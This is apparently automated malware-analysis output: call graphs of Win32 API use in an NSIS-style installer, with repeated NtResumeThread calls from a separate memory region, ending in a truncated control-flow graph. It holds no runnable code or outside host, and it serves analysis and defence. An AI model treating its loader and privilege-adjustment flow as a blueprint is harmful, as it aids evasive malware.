GetCurrentProcess OpenProcessToken 11418->11423 11419 4033e7 11421 4054ef MessageBoxIndirectA 11419->11421 11426 403398 11420->11426 11427 4033fd 11420->11427 11425 4033f5 ExitProcess 11421->11425 11428 403558 11423->11428 11429 403528 LookupPrivilegeValueA AdjustTokenPrivileges 11423->11429 11562 405859 11426->11562 11585 405472 11427->11585 11432 406092 5 API calls 11428->11432 11429->11428 11435 40355f 11432->11435 11438 403574 ExitWindowsEx 11435->11438 11441 403580 11435->11441 11436 403413 lstrcatA 11437 40341e lstrcatA lstrcmpiA 11436->11437 11437->11409 11440 40343a 11437->11440 11438->11422 11438->11441 11443 403446 11440->11443 11444 40343f 11440->11444 11445 40140b 2 API calls 11441->11445 11442 4033b2 11577 405cf9 lstrcpynA 11442->11577 11593 405455 CreateDirectoryA 11443->11593 11588 4053d8 CreateDirectoryA 11444->11588 11445->11422 11450 40344b SetCurrentDirectoryA 11451 403465 11450->11451 11452 40345a 11450->11452 11597 405cf9 lstrcpynA 11451->11597 11596 405cf9 lstrcpynA 11452->11596 11455 405d1b 18 API calls 11456 4034a4 DeleteFileA 11455->11456 11457 4034b1 CopyFileA 11456->11457 11462 403473 11456->11462 11457->11462 11458 4034f9 11459 405bb4 38 API calls 11458->11459 11459->11409 11461 405d1b 18 API calls 11461->11462 11462->11455 11462->11458 11462->11461 11463 40548a 2 API calls 11462->11463 11464 4034e5 CloseHandle 11462->11464 11598 405bb4 MoveFileExA 11462->11598 11463->11462 11464->11462 11465->11389 11466->11391 11468 405f64 5 API calls 11467->11468 11469 4030b4 11468->11469 11470 4030be 11469->11470 11471 40576b 3 API calls 11469->11471 11470->11398 11472 4030c6 11471->11472 11473 405455 2 API calls 11472->11473 11474 4030cc 11473->11474 11602 40599b 11474->11602 11606 40596c GetFileAttributesA CreateFileA 11477->11606 11479 402ca6 11504 402cb6 11479->11504 11607 405cf9 lstrcpynA 11479->11607 11481 402ccc 11608 4057b2 lstrlenA 11481->11608 11485 402cdd GetFileSize 11486 402cf4 11485->11486 11501 402dd9 11485->11501 11489 40307b ReadFile 11486->11489 11492 402e45 11486->11492 11500 402c02 6 API calls 11486->11500 11486->11501 11486->11504 11488 402de2 11490 402e12 GlobalAlloc 11488->11490 11488->11504 11625 403091 SetFilePointer 11488->11625 11489->11486 11624 403091 SetFilePointer 11490->11624 11494 402c02 6 API calls 11492->11494 11494->11504 11495 402dfb 11497 40307b ReadFile 11495->11497 11496 402e2d 11498 402e9f 36 API calls 11496->11498 11499 402e06 11497->11499 11502 402e39 11498->11502 11499->11490 11499->11504 11500->11486 11613 402c02 11501->11613 11502->11502 11503 402e76 SetFilePointer 11502->11503 11502->11504 11503->11504 11504->11407 11506 406092 5 API calls 11505->11506 11507 40368d 11506->11507 11508 403693 GetUserDefaultUILanguage 11507->11508 11509 4036a5 11507->11509 11626 405c57 wsprintfA 11508->11626 11510 405be0 3 API calls 11509->11510 11512 4036d0 11510->11512 11514 4036ee lstrcatA 11512->11514 11515 405be0 3 API calls 11512->11515 11513 4036a3 11627 40393e 11513->11627 11514->11513 11515->11514 11518 405859 18 API calls 11519 403720 11518->11519 11520 4037a9 11519->11520 11522 405be0 3 API calls 11519->11522 11521 405859 18 API calls 11520->11521 11523 4037af 11521->11523 11524 40374c 11522->11524 11525 4037bf LoadImageA 11523->11525 11526 405d1b 18 API calls 11523->11526 11524->11520 11532 403768 lstrlenA 11524->11532 11533 405796 CharNextA 11524->11533 11527 403865 11525->11527 11528 4037e6 RegisterClassA 11525->11528 11526->11525 11531 40140b 2 API calls 11527->11531 11529 40386f 11528->11529 11530 40381c SystemParametersInfoA CreateWindowExA 11528->11530 11529->11409 11530->11527 11536 40386b 11531->11536 11534 403776 lstrcmpiA 11532->11534 11535 40379c 11532->11535 11537 403766 11533->11537 11534->11535 11538 403786 GetFileAttributesA 11534->11538 11539 40576b 3 API calls 11535->11539 11536->11529 11541 40393e 19 API calls 11536->11541 11537->11532 11540 403792 11538->11540 11542 4037a2 11539->11542 11540->11535 11543 4057b2 2 API calls 11540->11543 11544 40387c 11541->11544 11636 405cf9 lstrcpynA 11542->11636 11543->11535 11546 403888 ShowWindow 11544->11546 11547 40390b 11544->11547 11549 406024 3 API calls 11546->11549 11637 404fe4 OleInitialize 11547->11637 11551 4038a0 11549->11551 11550 403911 11552 403915 11550->11552 11553 40392d 11550->11553 11554 4038ae GetClassInfoA 11551->11554 11558 406024 3 API calls 11551->11558 11552->11529 11560 40140b 2 API calls 11552->11560 11557 40140b 2 API calls 11553->11557 11555 4038c2 GetClassInfoA RegisterClassA 11554->11555 11556 4038d8 DialogBoxParamA 11554->11556 11555->11556 11559 40140b 2 API calls 11556->11559 11557->11529 11558->11554 11559->11529 11560->11529 11561->11396 11645 405cf9 lstrcpynA 11562->11645 11564 40586a 11646 405804 CharNextA CharNextA 11564->11646 11567 4033a3 11567->11409 11576 405cf9 lstrcpynA 11567->11576 11568 405f64 5 API calls 11571 405880 11568->11571 11569 4058ab lstrlenA 11570 4058b6 11569->11570 11569->11571 11572 40576b 3 API calls 11570->11572 11571->11567 11571->11569 11573 405ffd 2 API calls 11571->11573 11575 4057b2 2 API calls 11571->11575 11574 4058bb GetFileAttributesA 11572->11574 11573->11571 11574->11567 11575->11569 11576->11442 11577->11412 11579 4035b7 11578->11579 11580 4035a9 CloseHandle 11578->11580 11652 4035e4 11579->11652 11580->11579 11586 406092 5 API calls 11585->11586 11587 403402 lstrcatA 11586->11587 11587->11436 11587->11437 11589 403444 11588->11589 11590 405429 GetLastError 11588->11590 11589->11450 11590->11589 11591 405438 SetFileSecurityA 11590->11591 11591->11589 11592 40544e GetLastError 11591->11592 11592->11589 11594 405465 11593->11594 11595 405469 GetLastError 11593->11595 11594->11450 11595->11594 11596->11451 11597->11462 11599 405bd5 11598->11599 11600 405bc8 11598->11600 11599->11462 11706 405a42 lstrcpyA 11600->11706 11603 4059a6 GetTickCount GetTempFileNameA 11602->11603 11604 4030d7 11603->11604 11605 4059d3 11603->11605 11604->11398 11605->11603 11605->11604 11606->11479 11607->11481 11609 4057bf 11608->11609 11610 402cd2 11609->11610 11611 4057c4 CharPrevA 11609->11611 11612 405cf9 lstrcpynA 11610->11612 11611->11609 11611->11610 11612->11485 11614 402c23 11613->11614 11615 402c0b 11613->11615 11616 402c33 GetTickCount 11614->11616 11617 402c2b 11614->11617 11618 402c14 DestroyWindow 11615->11618 11619 402c1b 11615->11619 11621 402c41 CreateDialogParamA ShowWindow 11616->11621 11622 402c64 11616->11622 11620 4060ce 2 API calls 11617->11620 11618->11619 11619->11488 11623 402c31 11620->11623 11621->11622 11622->11488 11623->11488 11624->11496 11625->11495 11626->11513 11628 403952 11627->11628 11644 405c57 wsprintfA 11628->11644 11630 4039c3 11631 405d1b 18 API calls 11630->11631 11632 4039cf SetWindowTextA 11631->11632 11633 4036fe 11632->11633 11634 4039eb 11632->11634 11633->11518 11634->11633 11635 405d1b 18 API calls 11634->11635 11635->11634 11636->11520 11638 403f2a SendMessageA 11637->11638 11640 405007 11638->11640 11639 403f2a SendMessageA 11641 405040 OleUninitialize 11639->11641 11642 401389 2 API calls 11640->11642 11643 40502e 11640->11643 11641->11550 11642->11640 11643->11639 11644->11630 11645->11564 11647 40581f 11646->11647 11651 40582f 11646->11651 11649 40582a CharNextA 11647->11649 11647->11651 11648 40584f 11648->11567 11648->11568 11649->11648 11650 405796 CharNextA 11650->11651 11651->11648 11651->11650 11653 4035f2 11652->11653 11654 4035bc 11653->11654 11655 4035f7 FreeLibrary GlobalFree 11653->11655 11656 40559b 11654->11656 11655->11654 11655->11655 11657 405859 18 API calls 11656->11657 11658 4055bb 11657->11658 11659 4055c3 DeleteFileA 11658->11659 11660 4055da 11658->11660 11661 4033d6 OleUninitialize 11659->11661 11663 405708 11660->11663 11696 405cf9 lstrcpynA 11660->11696 11661->11418 11661->11419 11663->11661 11669 405ffd 2 API calls 11663->11669 11664 405600 11665 405613 11664->11665 11666 405606 lstrcatA 11664->11666 11668 4057b2 2 API calls 11665->11668 11667 405619 11666->11667 11670 405627 lstrcatA 11667->11670 11673 405632 lstrlenA FindFirstFileA 11667->11673 11668->11667 11671 40572c 11669->11671 11670->11673 11671->11661 11672 405730 11671->11672 11674 40576b 3 API calls 11672->11674 11673->11663 11679 405656 11673->11679 11675 405736 11674->11675 11677 405553 5 API calls 11675->11677 11676 405796 CharNextA 11676->11679 11678 405742 11677->11678 11680 405746 11678->11680 11681 40575c 11678->11681 11679->11676 11682 4056e7 FindNextFileA 11679->11682 11687 4056a8 11679->11687 11697 405cf9 lstrcpynA 11679->11697 11680->11661 11686 404f12 25 API calls 11680->11686 11684 404f12 25 API calls 11681->11684 11682->11679 11685 4056ff FindClose 11682->11685 11684->11661 11685->11663 11688 405753 11686->11688 11687->11682 11691 40559b 62 API calls 11687->11691 11693 404f12 25 API calls 11687->11693 11694 404f12 25 API calls 11687->11694 11695 405bb4 38 API calls 11687->11695 11698 405553 11687->11698 11689 405bb4 38 API calls 11688->11689 11692 40575a 11689->11692 11691->11687 11692->11661 11693->11682 11694->11687 11695->11687 11696->11664 11697->11679 11699 405947 2 API calls 11698->11699 11700 40555f 11699->11700 11701 405580 11700->11701 11702 405576 DeleteFileA 11700->11702 11703 40556e RemoveDirectoryA 11700->11703 11701->11687 11704 40557c 11702->11704 11703->11704 11704->11701 11705 40558c SetFileAttributesA 11704->11705 11705->11701 11707 405a90 GetShortPathNameA 11706->11707 11708 405a6a 11706->11708 11710 405aa5 11707->11710 11711 405baf 11707->11711 11733 40596c GetFileAttributesA CreateFileA 11708->11733 11710->11711 11713 405aad wsprintfA 11710->11713 11711->11599 11712 405a74 CloseHandle GetShortPathNameA 11712->11711 11714 405a88 11712->11714 11715 405d1b 18 API calls 11713->11715 11714->11707 11714->11711 11716 405ad5 11715->11716 11734 40596c GetFileAttributesA CreateFileA 11716->11734 11718 405ae2 11718->11711 11719 405af1 GetFileSize GlobalAlloc 11718->11719 11720 405b13 11719->11720 11721 405ba8 CloseHandle 11719->11721 11722 4059e4 ReadFile 11720->11722 11721->11711 11723 405b1b 11722->11723 11723->11721 11735 4058d1 lstrlenA 11723->11735 11726 405b32 lstrcpyA 11730 405b54 11726->11730 11727 405b46 11728 4058d1 4 API calls 11727->11728 11728->11730 11729 405b8b SetFilePointer 11731 405a13 WriteFile 11729->11731 11730->11729 11732 405ba1 GlobalFree 11731->11732 11732->11721 11733->11712 11734->11718 11736 405912 lstrlenA 11735->11736 11737 4058eb lstrcmpiA 11736->11737 11739 40591a 11736->11739 11738 405909 CharNextA 11737->11738 11737->11739 11738->11736 11739->11726 11739->11727 13486 33230ab 13487 3323177 13486->13487 13488 3341f72 13487->13488 13489 332328a 13487->13489 13490 3342d2f NtResumeThread 13488->13490 13495 334200d 13488->13495 13492 33232f8 NtResumeThread 13489->13492 13490->13495 13491 3347411 13493 33232f3 13492->13493 13494 33232f8 NtResumeThread 13493->13494 13494->13493 13495->13491 13496 3342220 NtResumeThread 13495->13496 13497 3342196 13496->13497 12759 4018f5 12760 40192c 12759->12760 12761 402a3a 18 API calls 12760->12761 12762 401931 12761->12762 12763 40559b 69 API calls 12762->12763 12764 40193a 12763->12764 12765 4024f7 12766 402a3a 18 API calls 12765->12766 12767 4024fe 12766->12767 12770 40596c GetFileAttributesA CreateFileA 12767->12770 12769 40250a 12770->12769 12785 332678e 12788 332899a 12785->12788 12787 3326797 12789 33289cd 12788->12789 12790 334342c NtResumeThread 12789->12790 12791 3328a1e 12790->12791 12792 334342c NtResumeThread 12791->12792 12793 3328b3e 12792->12793 12806 3341ab0 12793->12806 12795 3328b7f 12796 3347411 12795->12796 12797 3341255 NtResumeThread 12795->12797 12796->12787 12798 3328c3d 12797->12798 12799 3341255 NtResumeThread 12798->12799 12801 3328dd6 12799->12801 12800 3328e37 12800->12787 12801->12787 12801->12800 12802 3342d2f NtResumeThread 12801->12802 12803 334200d 12801->12803 12802->12803 12803->12796 12804 3342220 NtResumeThread 12803->12804 12805 3342196 12804->12805 12805->12787 12810 3341ad5 12806->12810 12807 3342d2f NtResumeThread 12809 334200d 12807->12809 12808 3347411 12808->12795 12809->12808 12811 3342220 NtResumeThread 12809->12811 12810->12795 12810->12807 12810->12809 12812 3342196 12811->12812 12812->12795 10714 402482 10724 402b44 10714->10724 10716 40248c 10728 402a1d 10716->10728 10718 402495 10719 4024b8 RegEnumValueA 10718->10719 10720 4024ac RegEnumKeyA 10718->10720 10721 4026a6 10718->10721 10719->10721 10722 4024d1 RegCloseKey 10719->10722 10720->10722 10722->10721 10731 402a3a 10724->10731 10726 402b5d 10727 402b6b RegOpenKeyExA 10726->10727 10727->10716 10729 405d1b 18 API calls 10728->10729 10730 402a31 10729->10730 10730->10718 10732 402a46 10731->10732 10737 405d1b 10732->10737 10735 402a73 10735->10726 10753 405d28 10737->10753 10738 405f4b 10739 402a67 10738->10739 10771 405cf9 lstrcpynA 10738->10771 10739->10735 10755 405f64 10739->10755 10741 405dc9 GetVersion 10741->10753 10742 405f22 lstrlenA 10742->10753 10743 405d1b 10 API calls 10743->10742 10746 405e41 GetSystemDirectoryA 10746->10753 10748 405e54 GetWindowsDirectoryA 10748->10753 10749 405f64 5 API calls 10749->10753 10750 405d1b 10 API calls 10750->10753 10751 405ecb lstrcatA 10751->10753 10752 405e88 SHGetSpecialFolderLocation 10752->10753 10754 405ea0 SHGetPathFromIDListA CoTaskMemFree 10752->10754 10753->10738 10753->10741 10753->10742 10753->10743 10753->10746 10753->10748 10753->10749 10753->10750 10753->10751 10753->10752 10764 405be0 RegOpenKeyExA 10753->10764 10769 405c57 wsprintfA 10753->10769 10770 405cf9 lstrcpynA 10753->10770 10754->10753 10762 405f70 10755->10762 10756 405fd8 10757 405fdc CharPrevA 10756->10757 10759 405ff7 10756->10759 10757->10756 10758 405fcd CharNextA 10758->10756 10758->10762 10759->10735 10761 405fbb CharNextA 10761->10762 10762->10756 10762->10758 10762->10761 10763 405fc8 CharNextA 10762->10763 10772 405796 10762->10772 10763->10758 10765 405c51 10764->10765 10766 405c13 RegQueryValueExA 10764->10766 10765->10753 10767 405c34 RegCloseKey 10766->10767 10767->10765 10769->10753 10770->10753 10771->10739 10773 40579c 10772->10773 10774 4057af 10773->10774 10775 4057a2 CharNextA 10773->10775 10774->10762 10775->10773 10776 402283 10777 402291 10776->10777 10778 40228b 10776->10778 10780 4022a1 10777->10780 10781 402a3a 18 API calls 10777->10781 10779 402a3a 18 API calls 10778->10779 10779->10777 10782 402a3a 18 API calls 10780->10782 10784 4022af 10780->10784 10781->10780 10782->10784 10783 402a3a 18 API calls 10785 4022b8 WritePrivateProfileStringA 10783->10785 10784->10783 10821 404e86 10822 404e96 10821->10822 10823 404eaa 10821->10823 10824 404e9c 10822->10824 10834 404ef3 10822->10834 10825 404eb2 IsWindowVisible 10823->10825 10831 404ed2 10823->10831 10835 403f2a 10824->10835 10828 404ebf 10825->10828 10825->10834 10826 404ef8 CallWindowProcA 10829 404ea6 10826->10829 10838 4047dd SendMessageA 10828->10838 10831->10826 10843 40485d 10831->10843 10834->10826 10836 403f42 10835->10836 10837 403f33 SendMessageA 10835->10837 10836->10829 10837->10836 10839 404800 GetMessagePos ScreenToClient SendMessageA 10838->10839 10840 40483c SendMessageA 10838->10840 10841 404834 10839->10841 10842 404839 10839->10842 10840->10841 10841->10831 10842->10840 10852 405cf9 lstrcpynA 10843->10852 10845 404870 10853 405c57 wsprintfA 10845->10853 10847 40487a 10854 40140b 10847->10854 10851 40488a 10851->10834 10852->10845 10853->10847 10858 401389 10854->10858 10857 405cf9 lstrcpynA 10857->10851 10860 401390 10858->10860 10859 4013fe 10859->10857 10860->10859 10861 4013cb MulDiv SendMessageA 10860->10861 10861->10860 13633 332b0fe 13634 332b118 13633->13634 13637 334250c 13634->13637 13636 332b11e 13640 3341f72 13637->13640 13638 3342d2f NtResumeThread 13641 334200d 13638->13641 13639 3342730 13639->13636 13640->13638 13640->13639 13640->13641 13641->13639 13642 3342220 NtResumeThread 13641->13642 13643 3342196 13642->13643 13643->13636 11020 40488f GetDlgItem GetDlgItem 11021 4048e1 7 API calls 11020->11021 11024 404af9 11020->11024 11022 404984 DeleteObject 11021->11022 11023 404977 SendMessageA 11021->11023 11025 40498d 11022->11025 11023->11022 11032 404b59 11024->11032 11035 404bbe 11024->11035 11036 404bdd 11024->11036 11026 4049c4 11025->11026 11029 405d1b 18 API calls 11025->11029 11027 403ede 19 API calls 11026->11027 11033 4049d8 11027->11033 11028 404c89 11030 404c93 SendMessageA 11028->11030 11038 404c9b 11028->11038 11031 4049a6 SendMessageA SendMessageA 11029->11031 11030->11038 11031->11025 11039 4047dd 5 API calls 11032->11039 11040 403ede 19 API calls 11033->11040 11034 404e71 11042 403f45 8 API calls 11034->11042 11035->11036 11037 404bcf SendMessageA 11035->11037 11036->11028 11036->11034 11041 404c36 SendMessageA 11036->11041 11037->11036 11044 404cb4 11038->11044 11045 404cad ImageList_Destroy 11038->11045 11052 404cc4 11038->11052 11056 404b6a 11039->11056 11057 4049e6 11040->11057 11041->11034 11047 404c4b SendMessageA 11041->11047 11043 404e7f 11042->11043 11048 404cbd GlobalFree 11044->11048 11044->11052 11045->11044 11046 404e33 11046->11034 11053 404e45 ShowWindow GetDlgItem ShowWindow 11046->11053 11050 404c5e 11047->11050 11048->11052 11049 404aba GetWindowLongA SetWindowLongA 11051 404ad3 11049->11051 11061 404c6f SendMessageA 11050->11061 11054 404af1 11051->11054 11055 404ad9 ShowWindow 11051->11055 11052->11046 11065 40485d 4 API calls 11052->11065 11070 404cff 11052->11070 11053->11034 11076 403f13 SendMessageA 11054->11076 11075 403f13 SendMessageA 11055->11075 11056->11035 11057->11049 11060 404a35 SendMessageA 11057->11060 11062 404ab4 11057->11062 11063 404a71 SendMessageA 11057->11063 11064 404a82 SendMessageA 11057->11064 11060->11057 11061->11028 11062->11049 11062->11051 11063->11057 11064->11057 11065->11070 11066 404aec 11066->11034 11067 404e09 InvalidateRect 11067->11046 11068 404e1f 11067->11068 11077 404798 11068->11077 11069 404d2d SendMessageA 11071 404d43 11069->11071 11070->11069 11070->11071 11071->11067 11072 404da4 11071->11072 11074 404db7 SendMessageA SendMessageA 11071->11074 11072->11074 11074->11071 11075->11066 11076->11024 11080 4046d3 11077->11080 11079 4047ad 11079->11046 11081 4046e9 11080->11081 11082 405d1b 18 API calls 11081->11082 11083 40474d 11082->11083 11084 405d1b 18 API calls 11083->11084 11085 404758 11084->11085 11086 405d1b 18 API calls 11085->11086 11087 40476e lstrlenA wsprintfA SetDlgItemTextA 11086->11087 11087->11079 11088 401f90 11089 401fa2 11088->11089 11090 402050 11088->11090 11091 402a3a 18 API calls 11089->11091 11092 401423 25 API calls 11090->11092 11093 401fa9 11091->11093 11098 4021c9 11092->11098 11094 402a3a 18 API calls 11093->11094 11095 401fb2 11094->11095 11096 401fc7 LoadLibraryExA 11095->11096 11097 401fba GetModuleHandleA 11095->11097 11096->11090 11099 401fd7 GetProcAddress 11096->11099 11097->11096 11097->11099 11100 402023 11099->11100 11101 401fe6 11099->11101 11102 404f12 25 API calls 11100->11102 11103 402005 11101->11103 11104 401fee 11101->11104 11106 401ff6 11102->11106 11109 100016bd 11103->11109 11151 401423 11104->11151 11106->11098 11107 402044 FreeLibrary 11106->11107 11107->11098 11110 100016ed 11109->11110 11154 10001a5d 11110->11154 11112 100016f4 11113 1000180a 11112->11113 11114 10001705 11112->11114 11115 1000170c 11112->11115 11113->11106 11203 100021b0 11114->11203 11186 100021fa 11115->11186 11120 10001722 11125 10001728 11120->11125 11129 10001733 11120->11129 11121 1000173b 11135 10001731 11121->11135 11213 10002aa3 11121->11213 11122 10001770 11126 100017b2 11122->11126 11127 10001776 11122->11127 11123 10001752 11216 100023da 11123->11216 11125->11135 11197 100027e8 11125->11197 11133 100023da 11 API calls 11126->11133 11131 10001559 3 API calls 11127->11131 11128 10001758 11227 10001559 11128->11227 11207 10002589 11129->11207 11137 1000178c 11131->11137 11138 100017a4 11133->11138 11135->11122 11135->11123 11141 100023da 11 API calls 11137->11141 11150 100017f9 11138->11150 11238 100023a0 11138->11238 11140 10001739 11140->11135 11141->11138 11145 10001803 GlobalFree 11145->11113 11147 100017e5 11147->11150 11242 100014e2 wsprintfA 11147->11242 11148 100017de FreeLibrary 11148->11147 11150->11113 11150->11145 11152 404f12 25 API calls 11151->11152 11153 401431 11152->11153 11153->11106 11245 10001215 GlobalAlloc 11154->11245 11156 10001a81 11246 10001215 GlobalAlloc 11156->11246 11158 10001cbb GlobalFree GlobalFree GlobalFree 11159 10001cd8 11158->11159 11163 10001d22 11158->11163 11160 1000201a 11159->11160 11161 10001ced 11159->11161 11159->11163 11160->11163 11164 1000203c GetModuleHandleA 11160->11164 11161->11163 11249 10001224 11161->11249 11162 10001b60 GlobalAlloc 11182 10001a8c 11162->11182 11163->11112 11165 10002062 11164->11165 11166 1000204d LoadLibraryA 11164->11166 11253 100015a4 GetProcAddress 11165->11253 11166->11163 11166->11165 11167 10001bab lstrcpyA 11170 10001bb5 lstrcpyA 11167->11170 11168 10001bc9 GlobalFree 11168->11182 11170->11182 11171 100020b3 11171->11163 11172 100020c0 lstrlenA 11171->11172 11254 100015a4 GetProcAddress 11172->11254 11174 10001f7a 11174->11163 11178 10001fbe lstrcpyA 11174->11178 11175 10002074 11175->11171 11185 1000209d GetProcAddress 11175->11185 11178->11163 11179 100020d9 11179->11163 11180 10001c07 11180->11182 11247 10001534 GlobalSize GlobalAlloc 11180->11247 11181 10001e75 GlobalFree 11181->11182 11182->11158 11182->11162 11182->11163 11182->11167 11182->11168 11182->11170 11182->11174 11182->11180 11182->11181 11184 10001224 2 API calls 11182->11184 11252 10001215 GlobalAlloc 11182->11252 11184->11182 11185->11171 11187 10002212 11186->11187 11189 10002349 GlobalFree 11187->11189 11191 100022b9 GlobalAlloc MultiByteToWideChar 11187->11191 11192 1000230a lstrlenA 11187->11192 11193 10001224 GlobalAlloc lstrcpynA 11187->11193 11256 100012ad 11187->11256 11189->11187 11190 10001712 11189->11190 11190->11120 11190->11121 11190->11135 11194 100022e3 GlobalAlloc CLSIDFromString GlobalFree 11191->11194 11195 10002303 11191->11195 11192->11189 11192->11195 11193->11187 11194->11189 11195->11189 11260 1000251d 11195->11260 11199 100027fa 11197->11199 11198 1000289f CreateFileA 11200 100028bd 11198->11200 11199->11198 11201 100029b9 11200->11201 11202 100029ae GetLastError 11200->11202 11201->11135 11202->11201 11204 100021c0 11203->11204 11206 1000170b 11203->11206 11205 100021d2 GlobalAlloc 11204->11205 11204->11206 11205->11204 11206->11115 11210 100025a5 11207->11210 11208 100025f6 GlobalAlloc 11212 10002618 11208->11212 11209 10002609 11211 1000260e GlobalSize 11209->11211 11209->11212 11210->11208 11210->11209 11211->11212 11212->11140 11214 10002aae 11213->11214 11215 10002aee GlobalFree 11214->11215 11263 10001215 GlobalAlloc 11216->11263 11218 1000243a lstrcpynA 11224 100023e6 11218->11224 11219 1000244b StringFromGUID2 WideCharToMultiByte 11219->11224 11220 1000246f WideCharToMultiByte 11220->11224 11221 100024b4 GlobalFree 11221->11224 11222 10002490 wsprintfA 11222->11224 11223 100024ee GlobalFree 11223->11128 11224->11218 11224->11219 11224->11220 11224->11221 11224->11222 11224->11223 11225 10001266 2 API calls 11224->11225 11264 100012d1 11224->11264 11225->11224 11268 10001215 GlobalAlloc 11227->11268 11229 1000155f 11231 10001586 11229->11231 11232 1000156c lstrcpyA 11229->11232 11233 100015a0 11231->11233 11234 1000158b wsprintfA 11231->11234 11232->11233 11235 10001266 11233->11235 11234->11233 11236 100012a8 GlobalFree 11235->11236 11237 1000126f GlobalAlloc lstrcpynA 11235->11237 11236->11138 11237->11236 11239 100023ae 11238->11239 11241 100017c5 11238->11241 11240 100023c7 GlobalFree 11239->11240 11239->11241 11240->11239 11241->11147 11241->11148 11243 10001266 2 API calls 11242->11243 11244 10001503 11243->11244 11244->11150 11245->11156 11246->11182 11248 10001552 11247->11248 11248->11180 11255 10001215 GlobalAlloc 11249->11255 11251 10001233 lstrcpynA 11251->11163 11252->11182 11253->11175 11254->11179 11255->11251 11257 100012b4 11256->11257 11258 10001224 2 API calls 11257->11258 11259 100012cf 11258->11259 11259->11187 11261 10002581 11260->11261 11262 1000252b VirtualAlloc 11260->11262 11261->11195 11262->11261 11263->11224 11265 100012f9 11264->11265 11266 100012da 11264->11266 11265->11224 11266->11265 11267 100012e0 lstrcpyA 11266->11267 11267->11265 11268->11229 12863 3322fe1 12864 33230a3 12863->12864 12865 3341f72 12864->12865 12866 332328a 12864->12866 12867 3342d2f NtResumeThread 12865->12867 12872 334200d 12865->12872 12866->12866 12869 33232f8 NtResumeThread 12866->12869 12867->12872 12868 3347411 12870 33232f3 12869->12870 12871 33232f8 NtResumeThread 12870->12871 12871->12870 12872->12868 12873 3342220 NtResumeThread 12872->12873 12874 3342196 12873->12874 11359 401595 11360 402a3a 18 API calls 11359->11360 11361 40159c SetFileAttributesA 11360->11361 11362 4015ae 11361->11362 12875 3321de4 12876 3321e33 12875->12876 12877 3321dd7 NtResumeThread 12876->12877 12878 3322e78 12877->12878 12879 3341f72 12878->12879 12880 332328a 12878->12880 12881 3342d2f NtResumeThread 12879->12881 12886 334200d 12879->12886 12883 33232f8 NtResumeThread 12880->12883 12881->12886 12882 3347411 12884 33232f3 12883->12884 12885 33232f8 NtResumeThread 12884->12885 12885->12884 12886->12882 12887 3342220 NtResumeThread 12886->12887 12888 3342196 12887->12888 12916 33231d4 12917 3341f72 12916->12917 12919 332328a 12916->12919 12918 3342d2f NtResumeThread 12917->12918 12924 334200d 12917->12924 12918->12924 12921 33232f8 NtResumeThread 12919->12921 12920 3347411 12920->12920 12922 33232f3 12921->12922 12923 33232f8 NtResumeThread 12922->12923 12923->12922 12924->12920 12925 3342220 NtResumeThread 12924->12925 12926 3342196 12925->12926 13686 3328cd5 13687 3328db1 13686->13687 13688 3341255 NtResumeThread 13687->13688 13690 3328dd6 13688->13690 13689 3328e37 13690->13689 13691 3342d2f NtResumeThread 13690->13691 13693 334200d 13690->13693 13691->13693 13692 3347411 13693->13692 13694 3342220 NtResumeThread 13693->13694 13695 3342196 13694->13695 12015 4015b3 12016 402a3a 18 API calls 12015->12016 12017 4015ba 12016->12017 12018 405804 4 API calls 12017->12018 12031 4015c2 12018->12031 12019 40161c 12021 401621 12019->12021 12022 40164a 12019->12022 12020 405796 CharNextA 12020->12031 12023 401423 25 API calls 12021->12023 12024 401423 25 API calls 12022->12024 12025 401628 12023->12025 12029 401642 12024->12029 12034 405cf9 lstrcpynA 12025->12034 12027 405455 2 API calls 12027->12031 12028 405472 5 API calls 12028->12031 12030 401633 SetCurrentDirectoryA 12030->12029 12031->12019 12031->12020 12031->12027 12031->12028 12032 401604 GetFileAttributesA 12031->12032 12033 4053d8 4 API calls 12031->12033 12032->12031 12033->12031 12034->12030 12936 4016b3 12937 402a3a 18 API calls 12936->12937 12938 4016b9 GetFullPathNameA 12937->12938 12939 4016d0 12938->12939 12945 4016f1 12938->12945 12941 405ffd 2 API calls 12939->12941 12939->12945 12940 401705 GetShortPathNameA 12942 4028cf 12940->12942 12943 4016e1 12941->12943 12943->12945 12946 405cf9 lstrcpynA 12943->12946 12945->12940 12945->12942 12946->12945 12965 401ebe 12966 402a3a 18 API calls 12965->12966 12967 401ec5 12966->12967 12968 405ffd 2 API calls 12967->12968 12969 401ecb 12968->12969 12971 401edd 12969->12971 12972 405c57 wsprintfA 12969->12972 12972->12971

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 4030d9-40310e SetErrorMode GetVersion 1 403110-403118 call 406092 0->1 2 403121 0->2 1->2 7 40311a 1->7 4 403126-403139 call 406024 lstrlenA 2->4 9 40313b-4031ae call 406092 * 2 #17 OleInitialize SHGetFileInfoA call 405cf9 GetCommandLineA call 405cf9 GetModuleHandleA 4->9 7->2 18 4031b0-4031b5 9->18 19 4031ba-4031cf call 405796 CharNextA 9->19 18->19 22 403294-403298 19->22 23 4031d4-4031d7 22->23 24 40329e 22->24 25 4031d9-4031dd 23->25 26 4031df-4031e7 23->26 27 4032b1-4032cb GetTempPathA call 4030a8 24->27 25->25 25->26 28 4031e9-4031ea 26->28 29 4031ef-4031f2 26->29 34 403323-40333d DeleteFileA call 402c66 27->34 35 4032cd-4032eb GetWindowsDirectoryA lstrcatA call 4030a8 27->35 28->29 32 403284-403291 call 405796 29->32 33 4031f8-4031fc 29->33 32->22 51 403293 32->51 37 403214-403241 33->37 38 4031fe-403204 33->38 53 4033d1-4033e1 call 40359f OleUninitialize 34->53 54 403343-403349 34->54 35->34 52 4032ed-40331d GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030a8 35->52 40 403243-403249 37->40 41 403254-403282 37->41 44 403206-403208 38->44 45 40320a 38->45 47 40324b-40324d 40->47 48 40324f 40->48 41->32 49 4032a0-4032ac call 405cf9 41->49 44->37 44->45 45->37 47->41 47->48 48->41 49->27 51->22 52->34 52->53 64 403505-40350b 53->64 65 4033e7-4033f7 call 4054ef ExitProcess 53->65 57 4033c1-4033c8 call 403679 54->57 58 40334b-403356 call 405796 54->58 66 4033cd 57->66 71 403358-403381 58->71 72 40338c-403396 58->72 69 403587-40358f 64->69 70 40350d-403526 GetCurrentProcess OpenProcessToken 64->70 66->53 73 403591 69->73 74 403595-403599 ExitProcess 69->74 78 403558-403566 call 406092 70->78 79 403528-403552 LookupPrivilegeValueA AdjustTokenPrivileges 70->79 80 403383-403385 71->80 76 403398-4033a5 call 405859 72->76 77 4033fd-403411 call 405472 lstrcatA 72->77 73->74 76->53 88 